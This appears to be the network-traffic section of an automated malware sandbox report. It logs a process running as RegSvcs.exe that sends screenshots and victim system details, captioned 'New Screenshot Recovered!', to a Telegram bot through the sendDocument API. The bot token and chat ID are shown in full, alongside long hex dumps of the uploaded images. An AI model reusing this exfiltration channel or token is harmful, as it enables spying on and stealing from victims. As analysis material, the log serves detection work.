2022-04-08 10:13:16 UTC	561	OUT	Data Raw: 82 ff 00 84 bb 55 ff 00 9e 89 f9 1f f1 a3 fe 12 ed 57 fe 7a 27 e4 7f c6 8e 74 1c ac f4 08 ac a1 86 57 95 43 97 71 82 5e 46 7e 3d 06 49 c0 f6 14 96 b6 31 5a 83 e5 82 49 01 4b 31 c9 c0 e8 3f 0a e0 3f e1 2e d5 7f e7 a2 7e 47 fc 68 ff 00 84 bb 55 ff 00 9e 89 f9 1f f1 a3 9d 07 2b 3b b3 a4 d9 98 cc 66 1f 94 aa a9 1b db a0 62 c0 75 f5 34 bf d9 76 be 4f 95 b1 f0 5f 7e ef 35 b7 ee f5 dd 9c e7 1c 75 ae 0f fe 12 ed 57 fe 7a 27 e4 7f c6 8f f8 4b b5 5f f9 e8 9f 91 ff 00 1a 39 d7 61 f2 b3 bb 1a 55 a0 8d 23 09 20 45 62 db 7c d7 c1 24 e4 e4 67 e6 e7 d7 35 24 96 30 cb 38 99 c1 24 6d e3 3c 12 a7 20 fe 19 35 c0 7f c2 5d aa ff 00 cf 44 fc 8f f8 d1 ff 00 09 76 ab ff 00 3d 13 f2 3f e3 47 3a 17 2b 3b 9d 4b 4d 5b c8 8e d5 02 56 d8 0b 12 46 54 38 62 38 fa 1a 65 c6 91 1b ac 09 16 Data Ascii: UWz'tWCq^F~=I1ZIK1??.~GhU+;fbu4vO_~5uWz'K_9aU# Eb\|$g5$08$m< 5]Dv=?G:+;KM[VFT8b8e
2022-04-08 10:13:16 UTC	577	OUT	Data Raw: a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b5 2d 32 3f ba 7e a7 f9 d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 4b 4c 8f ee 9f a9 fe 74 00 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 ab ca c1 af 62 c6 7f d5 bf 51 8e eb 56 ea ac ff 00 f1 fb 0f fd 73 7f e6 b4 00 d7 aa b6 7f f2 11 7f a3 7f 28 ea Data Ascii: xoo\|7FM>fxoo\|j8>-2?~z7h=4(&Oz7h=4(&nOKLto\|7FM>fxoo\|7FM>fR#&bQVs(
2022-04-08 10:13:16 UTC	593	OUT	Data Raw: fd f2 6a bc ac 1a f6 2c 67 fd 5b f5 18 ee b4 00 8f 55 6c ff 00 e4 22 ff 00 46 fe 51 d5 a7 aa b6 7f f2 11 7f a3 7f 28 e9 88 99 d8 22 16 39 c0 19 e0 12 7f 21 54 c6 a5 19 b4 92 e3 ca 97 11 bf 96 50 80 18 9c 81 eb ef 57 1c 95 42 42 96 20 67 68 c6 4f b7 35 95 6c b3 2c 17 09 3e 9a f2 2c 93 33 ec 66 8c e5 49 ff 00 7b 19 fa d0 06 94 32 34 89 b9 e1 78 8e 7e eb 95 27 f4 24 55 cb 3f f8 f7 1f ef 37 fe 84 6b 2b 4c b7 78 16 62 62 f2 23 79 37 47 08 23 e4 18 03 b7 03 27 27 03 d6 b5 6c ff 00 e3 dc 7f bc df fa 11 a1 81 3d 14 51 48 61 45 14 50 01 45 14 50 01 4c 8f ee 9f a9 fe 74 fa 64 7f 74 fd 4f f3 a0 07 d1 45 14 00 51 45 14 00 51 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 Data Ascii: j,g[Ul"FQ("9!TPWBB ghO5l,>,3fI{24x~'$U?7k+Lxbb#y7G#''l=QHaEPEPLtdtOEQEQES#>?SQEQEQEOGO:
2022-04-08 10:13:16 UTC	608	OUT	Data Raw: fe fb 7e 9f e1 46 d3 fd f6 fd 3f c2 9f 45 00 33 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b5 2d 32 3f ba 7e a7 f9 d0 01 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 96 99 1f dd 3f 53 fc e8 00 da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 Data Ascii: ~F?E3i~ME;~u>-2?~}Oi~O}Oi~O}Oi~O}O}OZ?SQ}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)
2022-04-08 10:13:16 UTC	624	OUT	Data Raw: 3b 7e fb 75 3e 9e b5 2d 32 3f ba 7e a7 f9 d0 01 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 96 99 1f dd 3f 53 fc e8 00 da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 a8 a7 6f df 6e a7 d3 d6 a5 a6 47 f7 4f d4 ff 00 3a 00 36 9f ef b7 e9 fe Data Ascii: ;~u>-2?~}Oi~O}Oi~O}Oi~O}O}OZ?SQ}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)onGO:6
2022-04-08 10:13:16 UTC	640	OUT	Data Raw: d0 96 e2 e4 cf b1 6e 04 4a 23 2e cc 50 1e 84 0f 6f 5a 07 9c 67 68 ee 25 32 6d 55 65 3b 36 63 24 fa 1f 6a 8e 74 69 26 91 14 65 9a d9 c0 1e f9 5a b3 31 06 fe 4c 10 7f 74 9d 3e ad 40 09 b0 7a b7 fd f4 69 21 00 5f 26 33 fe ad fa 9c f7 5a 75 24 5f f1 fd 1f fd 73 7f e6 b4 c0 67 d9 c7 fc fd 5d 7f df c1 fe 15 1e 9b ff 00 20 cb 4f fa e0 9f fa 08 a7 ef a6 69 bf f2 0c b4 ff 00 ae 09 ff 00 a0 8a 10 99 a1 45 47 e6 7b 51 e6 7b 52 b3 1d d1 25 15 1f 99 ed 47 99 ed 45 98 5d 12 51 51 f9 9e d4 79 9e d4 59 85 d1 25 15 1f 99 ed 47 99 ed 45 98 5d 12 51 51 f9 9e d4 79 9e d4 59 85 d1 25 15 1f 99 ed 47 99 ed 45 98 5d 12 51 51 f9 9e d4 79 9e d4 59 85 d1 25 15 1f 99 ed 47 99 ed 45 98 5d 12 51 51 f9 9e d4 79 9e d4 59 85 d1 25 15 1f 99 ed 47 99 ed 45 98 5d 12 51 51 f9 9e d4 79 9e d4 Data Ascii: nJ#.PoZgh%2mUe;6c$jti&eZ1Lt>@zi!_&3Zu$_sg] OiEG{Q{R%GE]QQyY%GE]QQyY%GE]QQyY%GE]QQyY%GE]QQy
2022-04-08 10:13:16 UTC	650	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 66 63 31 65 61 34 30 62 65 2d 2d 0d 0a Data Ascii: -----------------------------8da195fc1ea40be--
2022-04-08 10:13:16 UTC	651	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:16 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":125,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412796,"document":{"file_name":"user-082561 2022-04-08 12-59-29.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA31iUAq85MSvsRQfGV7iGyKs5il4sQAC8QoAAkCUgFLBe13yGMP5pAEAB20AAyME","file_unique_id":"AQAD8QoAAkCUgFJy","file_size":13830,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAN9YlAKvOTEr7EUHxle4hsirOYpeLEAAvEKAAJAlIBSwXtd8hjD-aQjBA","file_unique_id":"AgAD8QoAAkCUgFI","file_size":107691},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49176	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:21 UTC	652	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196245dad951 Host: api.telegram.org Content-Length: 112430 Expect: 100-continue
2022-04-08 10:13:22 UTC	653	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:22 UTC	653	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 32 34 35 64 61 64 39 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 32 34 35 64 61 64 39 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da196245dad951Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da196245dad951Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:22 UTC	654	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea e7 ba 31 a1 90 c8 b1 46 1b 6e e6 8c be 4f 7e 01 18 14 c4 b9 79 6f 0d a4 77 70 b4 c0 6e 20 5b b1 00 7a e7 7e 3b d5 5b fb a1 6d a4 c8 db 43 b3 3c aa aa 7b 9d ed 46 80 f0 e0 6d 55 49 6e 36 c8 48 fe 2c 75 1f 87 3f ad 65 cf ef 59 99 73 6b 63 42 da e4 cb 6b 6b 23 8f 9a 75 53 f2 f4 04 ae ef cb 8a 75 cc e2 de 2d e5 73 f8 e3 b6 6a ae 9e 73 a6 e9 87 fd 84 ff Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?1FnO~yowpn [z~;[mC<{FmUIn6H,u?eYskcBkk#uSu-sjs
2022-04-08 10:13:22 UTC	670	OUT	Data Raw: 35 48 56 77 89 1c 4d 80 0b 7e ea 40 87 86 5e f9 1c 7f 9f 7a c6 92 de e2 5d 56 3b 80 65 74 b6 dc 15 0b 8c 85 70 06 37 6f eb f2 9e 7a fa d7 47 3d b5 bd ca 81 71 04 72 81 c8 12 20 6c 7e 75 0f f6 5e 9d ff 00 3e 16 bf f7 e5 7f c2 a9 34 2d 4c fd 02 23 15 f5 f8 2b 20 2c a8 df bc 93 79 e5 9c f5 c9 e2 a3 4d 2a e8 69 86 db cb 1b 4c 05 8a 6e 1f eb 76 ed c7 d3 a1 fa 8a da 82 d6 da d7 77 d9 ed e2 87 77 de f2 d0 2e 7e b8 a9 73 49 ea c6 b4 32 12 c2 6f ed 91 71 2a cc 42 85 f2 dd 0c 7b 54 05 c1 53 9f 9b ae 7a 71 cd 55 96 de 2d 3b 4f b0 fb 5c 11 79 68 ad e6 c4 ce 8a 4c 98 18 6e 48 04 8c 11 c1 cf 3c 57 43 9a 33 49 82 39 f8 34 e9 e4 5d 35 a5 8e 7f 2e 38 10 0f 2f 66 63 60 72 49 dd c8 e3 1f 77 9e 2b 47 54 86 59 a5 87 f7 32 cd 00 0d b9 62 75 56 0d d8 e4 91 c6 32 31 9e fc 83 57 Data Ascii: 5HVwM~@^z]V;etp7ozG=qr l~u^>4-L#+ ,yMiLnvww.~sI2oqB{TSzqU-;O\yhLnH<WC3I94]5.8/fc`rIw+GTY2buV21W
2022-04-08 10:13:22 UTC	685	OUT	Data Raw: 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 Data Ascii: zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f
2022-04-08 10:13:22 UTC	701	OUT	Data Raw: 26 8d e3 d1 bf ef 93 40 0f a6 47 f7 4f d4 ff 00 3a 37 8f 46 ff 00 be 4d 35 1c 05 e8 dd 4f f0 9f 5a 00 96 8a 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d0 03 e8 a6 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 00 3e 8a 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d0 03 e9 91 fd d3 f5 3f ce 8d e3 d1 bf ef 93 4d 47 01 7a 37 53 fc 27 d6 80 25 aa b3 ff 00 c7 ec 3f f5 cd ff 00 9a d4 fb c7 a3 7f df 26 ab ca c1 af 62 c6 7f d5 bf 51 8e eb 40 08 f5 4e df fe 42 0f ff 00 02 fe 51 d5 c7 aa 76 ff 00 f2 10 7f f8 17 f2 8e a8 45 87 60 88 58 e7 00 67 80 49 fc 85 56 86 fa 39 ad e4 99 63 94 04 72 85 76 65 b2 3d 85 59 72 55 09 0a 58 81 9d a3 19 3e dc d6 75 81 b8 82 3b 93 25 94 c0 b4 ad 22 8d c9 92 09 e9 f7 ba d2 02 e5 a5 c2 dd db 24 e8 ac aa e3 20 37 51 57 ac ff 00 e3 dc 7f bc df fa 11 ac 9d 1d Data Ascii: &@GO:7FM5OZfxoo\|7FM>fxo?MGz7S'%?&bQ@NBQvE`XgIV9crve=YrUX>u;%"$ 7QW
2022-04-08 10:13:22 UTC	717	OUT	Data Raw: f7 db f4 ff 00 0a 7d 14 00 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 7d 14 00 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 7d 14 00 cd a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d4 b4 c8 fe e9 fa 9f e7 40 06 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 3e 8a 00 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 3e 8a 00 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 3e 8a 00 66 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 6a 5a 64 7f 74 fd 4f f3 a0 03 69 fe fb 7e 9f e1 46 d3 fd f6 fd 3f c2 9f 45 00 33 69 fe fb 7e 9f e1 46 d3 fd f6 fd 3f c2 9f 45 00 33 69 fe fb 7e 9f e1 46 d3 fd f6 fd 3f c2 9f 45 00 33 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b5 2d 32 3f ba 7e a7 f9 d0 01 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 19 b4 ff 00 7d bf 4f f0 a3 69 fe fb 7e 9f e1 4f a2 80 Data Ascii: }O}O}5z@?>f?>f?>f?v}=jZdtOi~F?E3i~F?E3i~F?E3i~ME;~u>-2?~}Oi~O}Oi~O
2022-04-08 10:13:22 UTC	733	OUT	Data Raw: d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 4b 4c 8f ee 9f a9 fe 74 00 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d4 b4 c8 fe e9 fa 9f e7 40 06 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 Data Ascii: z7h=4(&Oz7h=4(&nOKLto\|7FM>fxoo\|7FM>fR#&Oz7h=4(&Oz7i/F@xoo\|7FM>f
2022-04-08 10:13:22 UTC	748	OUT	Data Raw: f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a ab 79 d5 3f 1a 9f 69 fe fb 7e 9f e1 55 ee 81 05 32 c4 f5 eb 42 02 21 4d 1f f1 fb 1f fd 73 7f e6 b4 e1 4d 1f f1 fb 1f fd 73 7f e6 b5 42 16 45 2d 1b 28 2c 09 04 65 7a 8f a5 62 34 b2 c7 1d e4 41 e6 88 e6 3f 2e 29 65 2c fc 9c 10 18 Data Ascii: #Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZy?i~U2B!MsMsBE-(,ezb4A?.)e,
2022-04-08 10:13:22 UTC	762	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 32 34 35 64 61 64 39 35 31 2d 2d 0d 0a Data Ascii: -----------------------------8da196245dad951--
2022-04-08 10:13:22 UTC	762	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:22 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":126,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412802,"document":{"file_name":"user-082561 2022-04-08 01-18-29.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA35iUArCJz__4jBixUJxs84z6H7kIwAC8goAAkCUgFJsBnEYCxfvYQEAB20AAyME","file_unique_id":"AQAD8goAAkCUgFJy","file_size":13765,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAN-YlAKwic__-IwYsVCcbPOM-h-5CMAAvIKAAJAlIBSbAZxGAsX72EjBA","file_unique_id":"AgAD8goAAkCUgFI","file_size":111842},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49177	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:29 UTC	764	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19651155316a Host: api.telegram.org Content-Length: 112590 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:29 UTC	764	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:29 UTC	764	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 35 31 31 35 35 33 31 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 35 31 31 35 35 33 31 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da19651155316aContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da19651155316aContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:29 UTC	765	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea e7 ba 31 a1 90 c8 b1 46 1b 6e e6 8c be 4f 7e 01 18 14 c4 b9 79 6f 0d a4 77 70 b4 c0 6e 20 5b b1 00 7a e7 7e 3b d5 5b fb a1 6d a4 c8 db 43 b3 3c aa aa 7b 9d ed 46 80 f0 e0 6d 55 49 6e 36 c8 48 fe 2c 75 1f 87 3f ad 65 cf ef 59 99 73 6b 63 42 da e4 cb 6b 6b 23 8f 9a 75 53 f2 f4 04 ae ef cb 8a 75 cc e2 de 2d e5 73 f8 e3 b6 6a ae 9e 73 a6 e9 87 fd 84 ff Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?1FnO~yowpn [z~;[mC<{FmUIn6H,u?eYskcBkk#uSu-sjs
2022-04-08 10:13:29 UTC	781	OUT	Data Raw: 35 48 56 77 89 1c 4d 80 0b 7e ea 40 87 86 5e f9 1c 7f 9f 7a c6 92 de e2 5d 56 3b 80 65 74 b6 dc 15 0b 8c 85 70 06 37 6f eb f2 9e 7a fa d7 47 3d b5 bd ca 81 71 04 72 81 c8 12 20 6c 7e 75 0f f6 5e 9d ff 00 3e 16 bf f7 e5 7f c2 a9 34 2d 4c fd 02 23 15 f5 f8 2b 20 2c a8 df bc 93 79 e5 9c f5 c9 e2 a3 4d 2a e8 69 86 db cb 1b 4c 05 8a 6e 1f eb 76 ed c7 d3 a1 fa 8a da 82 d6 da d7 77 d9 ed e2 87 77 de f2 d0 2e 7e b8 a9 73 49 ea c6 b4 32 12 c2 6f ed 91 71 2a cc 42 85 f2 dd 0c 7b 54 05 c1 53 9f 9b ae 7a 71 cd 55 96 de 2d 3b 4f b0 fb 5c 11 79 68 ad e6 c4 ce 8a 4c 98 18 6e 48 04 8c 11 c1 cf 3c 57 43 9a 33 49 82 39 f8 34 e9 e4 5d 35 a5 8e 7f 2e 38 10 0f 2f 66 63 60 72 49 dd c8 e3 1f 77 9e 2b 47 54 86 59 a5 87 f7 32 cd 00 0d b9 62 75 56 0d d8 e4 91 c6 32 31 9e fc 83 57 Data Ascii: 5HVwM~@^z]V;etp7ozG=qr l~u^>4-L#+ ,yMiLnvww.~sI2oqB{TSzqU-;O\yhLnH<WC3I94]5.8/fc`rIw+GTY2buV21W
